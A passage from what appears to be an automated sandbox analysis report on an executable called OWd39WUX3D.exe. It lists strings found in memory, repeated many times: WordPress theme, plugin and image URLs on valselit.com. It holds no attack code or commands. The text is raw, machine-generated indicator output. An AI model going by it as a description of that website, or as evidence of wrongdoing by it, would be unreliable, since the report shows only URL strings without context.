              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.5.2
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/bootstrap.css?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/default.css?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/fontawesome-all.css?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/css/responsive.css?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/bootstrap.js?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/jquery.superfish.js?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/js/theme.js?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/themes/internet-provider/style.css?ver=6.0.5
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant-226x300.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.423323180.0000000003C10000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2020/06/primo-accedant.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-1024x682.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.386839699.0000000006D30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391710868.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581221941.0000000003B10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.389334492.0000000007C30000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427101284.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.420833626.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387128009.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.387185326.0000000003520000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390649604.00000000037A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.valselit.com/wp-content/uploads/2022/12/image_20210920_231753_527-300x200.jpg
              Source: OWd39WUX3D.exe, 00000000.00000003.424201478.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.391151091.0000000002E60000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.392317371.0000000004190000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.390418253.0000000005100000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, 